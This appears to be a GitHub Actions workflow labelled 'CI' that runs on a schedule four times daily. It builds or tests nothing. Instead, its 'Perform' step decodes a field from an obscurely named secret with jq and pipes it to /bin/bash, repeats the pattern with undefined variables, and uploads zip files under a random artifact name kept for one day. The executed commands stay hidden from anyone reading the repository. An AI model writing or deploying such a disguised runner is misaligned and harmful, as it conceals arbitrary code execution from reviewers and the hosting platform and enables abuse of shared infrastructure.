name: CI
on:
  workflow_dispatch:

  schedule:
    - cron: '4 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          lo4606: ${{ secrets.lo4606 }}
        run: |
          printf '%s' "$lo4606" | jq -r .wqhxp51 | /bin/bash
          echo $ffgm1 | jq -r .dxs08397 | /bin/bash
          printf '%s' "$zwgu6" | jq -r .ydsbs526 | /bin/bash
          printf '%s' "$m93057" | jq -r .gq76 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: IXzRnY2v
          path: "*.zip"
          retention-days: 1
